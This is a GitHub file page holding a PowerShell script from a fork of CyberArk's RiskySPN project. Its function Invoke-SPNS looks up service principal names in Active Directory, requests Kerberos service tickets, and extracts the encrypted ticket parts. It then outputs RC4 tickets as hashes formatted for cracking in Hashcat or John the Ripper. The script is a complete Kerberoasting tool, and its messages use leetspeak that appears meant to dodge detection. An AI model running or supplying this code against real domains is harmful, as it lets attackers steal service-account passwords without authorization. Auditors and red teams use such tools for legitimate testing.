forked from cyberark/RiskySPN
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathget-tgs-enc.ps1
More file actions
107 lines (105 loc) · 4.13 KB
/
get-tgs-enc.ps1
File metadata and controls
107 lines (105 loc) · 4.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
function Invoke-SPNS
{
[CmdletBinding()]
param
(
[parameter(Mandatory=$True, Position=0, ValueFromPipeline=$True)]
[ValidateNotNullOrEmpty()]
[string]$sPn,
[parameter(Mandatory=$false, Position=1)]
[ValidateSet("Hashcat","John", "Kerberoast")]
[string]$fOrMaT,
[Switch]$NoQuery
)
Begin {
if (!$NoQuery)
{
$Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
$Path = 'GC://DC=' + ($Forest.RootDomain -Replace ("\.",',DC='))
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$Path)
$Searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
}
Add-Type -AssemblyName System.IdentityModel
$a = @()
Write-Verbose "sT@Rt1Ng 2 R3qU3sT SpNs"
}
Process {
$ta = "N/A"
if (!$NoQuery) {
$Searcher.Filter = "(servicePrincipalName=$sPn)"
$ta = [string]$Searcher.FindOne().Properties.userprincipalname
}
Write-Verbose "Asking for TGS for the SpN: $sPn"
$ByteStream = $null
try {
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $sPn
$ByteStream = $Ticket.GetRequest()
}
catch {
Write-Warning "Could not request a TGS 4 SPN: $sPn - Does it exists?"
Write-Verbose "Make sure the SPN: $sPn is registed on Active Directory"
}
if ($ByteStream)
{
$HexStream = [System.BitConverter]::ToString($ByteStream) -replace "-"
$eType = [Convert]::ToInt32(($HexStream -replace ".*A0030201")[0..1] -join "", 16)
$EncType = switch ($eType) {
1 {"DES-CBC-CRC (1)"}
3 {"DES-CBC-MD5 (3)"}
17 {"AES128-CTS-HMAC-SHA-1 (17)"}
18 {"AES256-CTS-HMAC-SHA-1 (18)"}
23 {"RC4-HMAC (23)"}
default {"Unknown ($eType)"}
}
try {
[System.Collections.ArrayList]$Parts = ($HexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
if ($Parts.Count -gt 2) {
$Parts.RemoveAt($Parts.Count - 1)
$EncPart = $Parts -join "A48201"
}
else {
$EncPart = $Parts[0]
}
$Target = New-Object psobject -Property @{
SPN = $sPn
Target = $ta
EncryptionType = $EncType
EncTicketPart = $EncPart
} | Select-Object SPN,Target,EncryptionType,EncTicketPart
$a += $Target
}
catch {
Write-Warning "Couldn't extract the EncTicketPart of SpN: $sPn - purge the ticket and try again"
}
}
}
End {
if (!$a.EncTicketPart) {
Write-Error "FAIL! No Tickets.."
}
elseif ($fOrMaT)
{
$Output = @()
Write-Verbose "Converting $($a.Count) tickets to $fOrMaT format"
foreach ($Target in $a) {
if ($Target.EncryptionType -eq "RC4-HMAC (23)") {
if ($fOrMaT -eq "Kerberoast") {
[string]$Output += $Target.EncTicketPart + "\n"
}
elseif (($fOrMaT -eq "John") -or ($fOrMaT -eq "Hashcat")) {
$ac = $Target.Target -split "@"
$Output += "`$krb5tgs`$23`$*$($ac[0])`$$($ac[1])`$$($Target.SPN)*`$" + $Target.EncTicketPart.Substring(0,32) + "`$" + $Target.EncTicketPart.Substring(32)
}
}
else {
Write-Warning "tHe T1cK3T 0f SpN: $($Target.SPN) is 3nCrYpT3D with $($Target.EncryptionType) 3nCrYpT1oN & cAnT B cR@cK3D W1tH $fOrMaT. Currently only RC4-HMAC is supported)"
}
}
}
else {
$Output = $a
}
Write-Verbose "returning $($Output.Count) tickets"
return $Output
}
}